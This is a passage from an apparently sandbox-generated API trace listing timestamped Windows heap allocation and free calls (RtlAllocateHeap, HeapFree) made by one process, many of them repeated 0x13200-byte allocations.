lpMem=0x47e950 | out: hHeap=0x430000) returned 1 [0216.666] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f770 | out: hHeap=0x430000) returned 1 [0216.666] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2277) returned 0x465320 [0216.666] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1157) returned 0x47dfe0 [0216.667] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8a0) returned 0x47f140 [0216.667] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x465320 | out: hHeap=0x430000) returned 1 [0216.667] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0216.667] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1fc7) returned 0x465320 [0216.667] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463dd0 | out: hHeap=0x430000) returned 1 [0216.667] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f140 | out: hHeap=0x430000) returned 1 [0216.667] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1657) returned 0x47dfe0 [0216.667] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xb20) returned 0x4487a0 [0216.668] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x590) returned 0x47f640 [0216.668] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0216.668] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.668] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2f96) returned 0x4672f0 [0216.668] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x465320 | out: hHeap=0x430000) returned 1 [0216.668] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f640 | out: hHeap=0x430000) returned 1 [0216.668] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2b47) returned 0x463dd0 [0216.668] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x15b7) returned 0x47dfe0 [0216.669] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xad0) returned 0x4487a0 [0216.669] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463dd0 | out: hHeap=0x430000) returned 1 [0216.669] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0216.669] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.670] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2697) returned 0x463dd0 [0216.670] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1367) returned 0x47dfe0 [0216.670] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9a0) returned 0x47f350 [0216.670] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463dd0 | out: hHeap=0x430000) returned 1 [0216.670] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0216.670] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x474d) returned 0x449a80 [0216.671] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4672f0 | out: hHeap=0x430000) returned 1 [0216.671] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f350 | out: hHeap=0x430000) returned 1 [0216.671] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x920) returned 0x4487a0 [0216.671] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.671] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1b47) returned 0x47dfe0 [0216.671] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xd90) returned 0x4487a0 [0216.671] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x6d0) returned 0x44e1e0 [0216.671] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0216.672] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.672] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44e1e0 | out: hHeap=0x430000) returned 1 [0216.672] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5d0) returned 0x4487a0 [0216.672] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x6adf) returned 0x463dd0 [0216.672] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449a80 | out: hHeap=0x430000) returned 1 [0216.672] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.672] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1887) returned 0x47dfe0 [0216.672] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xc30) returned 0x4487a0 [0216.672] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x620) returned 0x47f870 [0216.672] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0216.672] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.672] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f870 | out: hHeap=0x430000) returned 1 [0216.672] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8f0) returned 0x4487a0 [0216.673] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x480) returned 0x4490a0 [0216.673] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x240) returned 0x43a840 [0216.673] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.673] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4490a0 | out: hHeap=0x430000) returned 1 [0216.673] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43a840 | out: hHeap=0x430000) returned 1 [0216.673] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x40) returned 0x440860 [0216.673] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43ae30 | out: hHeap=0x430000) returned 1 [0216.673] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45e1e0 | out: hHeap=0x430000) returned 1 [0216.674] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463dd0 | out: hHeap=0x430000) returned 1 [0216.675] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440860 | out: hHeap=0x430000) returned 1 [0216.675] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9900) returned 0x449a80 [0217.064] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1bf0) returned 0x47dfe0 [0217.066] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0217.066] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9937) returned 0x45e1e0 [0217.067] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449a80 | out: hHeap=0x430000) returned 1 [0217.068] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43ae30 [0217.068] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9900) returned 0x449a80 [0217.068] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1bf0) returned 0x47dfe0 [0217.068] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0217.068] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9937) returned 0x47dfe0 [0217.069] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449a80 | out: hHeap=0x430000) returned 1 [0217.070] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x40) returned 0x440ea0 [0217.070] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43ae30 | out: hHeap=0x430000) returned 1 [0217.070] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x453e30 | out: hHeap=0x430000) returned 1 [0217.071] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x46e0e0 | out: hHeap=0x430000) returned 1 [0217.071] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440a40 | out: hHeap=0x430000) returned 1 [0217.071] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x449a80 [0217.072] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x467b20 [0217.072] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8) returned 0x4394a0 [0217.072] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x487920 [0217.072] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449860 [0217.072] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4394a0 | out: hHeap=0x430000) returned 1 [0217.073] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x49ab30 [0217.073] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x18) returned 0x4497c0 [0217.073] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449860 | out: hHeap=0x430000) returned 1 [0217.073] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4add40 [0217.073] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43ae30 [0217.073] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4497c0 | out: hHeap=0x430000) returned 1 [0217.073] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4c0f50 [0217.074] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x30) returned 0x43e580 [0217.074] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43ae30 | out: hHeap=0x430000) returned 1 [0217.074] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4d4160 [0217.074] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4e7370 [0217.075] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x48) returned 0x440c20 [0217.075] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43e580 | out: hHeap=0x430000) returned 1 [0217.075] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4fa580 [0217.075] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x50d790 [0217.076] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e10080 [0217.077] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x68) returned 0x438920 [0217.077] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440c20 | out: hHeap=0x430000) returned 1 [0217.077] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e23290 [0217.077] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e364a0 [0217.078] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e496b0 [0217.078] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e5c8c0 [0217.078] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x98) returned 0x434c50 [0217.078] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438920 | out: hHeap=0x430000) returned 1 [0217.079] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e6fad0 [0217.079] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e82ce0 [0217.080] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e95ef0 [0217.080] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ea9100 [0217.080] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ebc310 [0217.082] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ecf520 [0217.082] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xe0) returned 0x434880 [0217.082] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x434c50 | out: hHeap=0x430000) returned 1 [0217.082] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ee2730 [0217.083] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1f40080 [0217.084] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1f53290 [0217.084] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1f664a0 [0217.085] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1f796b0 [0217.085] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1f8c8c0 [0217.085] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1f9fad0 [0217.086] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1fb2ce0 [0217.086] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1fc5ef0 [0217.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x150) returned 0x43ac50 [0217.087] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x434880 | out: hHeap=0x430000) returned 1 [0217.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1fd9100 [0217.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1fec310 [0217.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1fff520 [0217.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2012730 [0217.089] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2025940 [0217.090] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2038b50 [0217.090] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x204bd60 [0217.091] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x205ef70 [0217.091] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2072180 [0217.092] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2085390 [0217.093] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20985a0 [0217.093] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20ab7b0 [0217.094] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20be9c0 [0217.094] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20d1bd0 [0217.094] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1f8) returned 0x43a840 [0217.094] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43ac50 | out: hHeap=0x430000) returned 1 [0217.094] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20e4de0 [0217.094] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20f7ff0 [0217.095] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x210b200 [0217.095] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x211e410 [0217.096] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2140080 [0217.096] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2153290 [0217.097] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21664a0 [0217.097] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21796b0 [0217.098] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x218c8c0 [0218.661] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x219fad0 [0218.662] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21b2ce0 [0218.662] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21c5ef0 [0218.662] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21d9100 [0218.663] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21ec310 [0218.663] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21ff520 [0218.664] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2212730 [0218.664] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2225940 [0218.664] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2238b50 [0218.665] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x224bd60 [0218.665] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x225ef70 [0218.666] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2272180 [0218.666] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2f0) returned 0x4487a0 [0218.666] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43a840 | out: hHeap=0x430000) returned 1 [0218.666] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2285390 [0218.667] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22985a0 [0218.667] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22ab7b0 [0218.668] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22be9c0 [0218.668] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22d1bd0 [0218.668] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22e4de0 [0218.669] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22f7ff0 [0218.669] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x230b200 [0218.670] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x231e410 [0218.670] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2331620 [0218.671] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2344830 [0218.671] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2357a40 [0218.672] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x236ac50 [0218.672] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x237de60 [0218.674] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2391070 [0218.675] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23a4280 [0218.675] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23b7490 [0218.676] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23ca6a0 [0218.676] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23dd8b0 [0218.677] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23f0ac0 [0218.677] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2403cd0 [0218.678] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2416ee0 [0218.678] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x242a0f0 [0218.678] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x243d300 [0218.679] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2450510 [0218.679] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2463720 [0218.680] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2476930 [0218.680] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2489b40 [0218.680] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x249cd50 [0218.681] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24aff60 [0218.681] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24c3170 [0218.681] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x468) returned 0x448aa0 [0218.681] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0218.682] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24d6380 [0218.682] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24e9590 [0218.682] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24fc7a0 [0218.683] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x250f9b0 [0218.683] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2522bc0 [0218.684] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2540080 [0218.684] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2553290 [0218.685] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25664a0 [0218.685] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25796b0 [0218.686] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x258c8c0 [0218.686] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x259fad0 [0218.686] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25b2ce0 [0218.687] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25c5ef0 [0218.688] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25d9100 [0218.690] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25ec310 [0218.690] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25ff520 [0218.690] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2612730 [0218.691] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2625940 [0218.691] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2638b50 [0218.692] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x264bd60 [0218.692] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x265ef70 [0218.693] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2672180 [0218.693] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2685390 [0218.694] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26985a0 [0218.694] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26ab7b0 [0218.694] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26be9c0 [0218.695] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26d1bd0 [0218.695] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26e4de0 [0218.695] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26f7ff0 [0218.695] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x270b200 [0218.696] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x271e410 [0218.696] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2731620 [0218.697] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2744830 [0218.697] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2757a40 [0218.698] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x276ac50 [0218.698] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x277de60 [0218.698] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2791070 [0218.699] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27a4280 [0218.699] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27b7490 [0218.700] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27ca6a0 [0218.700] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27dd8b0 [0218.701] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27f0ac0 [0218.981] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2803cd0 [0218.981] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2816ee0 [0218.982] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x282a0f0 [0218.982] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x283d300 [0218.982] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2850510 [0218.983] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x698) returned 0x448f10 [0218.983] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448aa0 | out: hHeap=0x430000) returned 1 [0218.983] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2863720 [0218.984] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2876930 [0218.984] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2889b40 [0218.984] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x289cd50 [0218.985] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28aff60 [0218.985] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28c3170 [0218.986] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28d6380 [0218.986] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28e9590 [0218.986] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28fc7a0 [0218.987] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x290f9b0 [0218.987] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2922bc0 [0218.987] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2935dd0 [0218.988] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2948fe0 [0218.988] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x295c1f0 [0218.988] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x296f400 [0218.989] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2982610 [0218.990] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2995820 [0218.991] 